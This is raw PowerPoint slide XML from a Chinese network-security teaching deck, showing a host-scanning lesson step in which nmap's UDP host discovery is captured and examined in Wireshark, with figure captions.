                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="文本框 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="983615"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用Wireshark工具抓取nmap工具发送的数据包，如图2-2-18所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1628775"/>
            <a:ext cx="5267325" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="文本框 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5229225"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-18 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行UDP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="文本框 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="951547"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.筛选信息进行分析，可以发现nmap工具向目标主机的40125端口发送了一个UDP包，如图2-2-19所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1873567"/>
            <a:ext cx="5276850" cy="3609975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="文本框 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5483543"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-19 发送UDP包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行UDP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
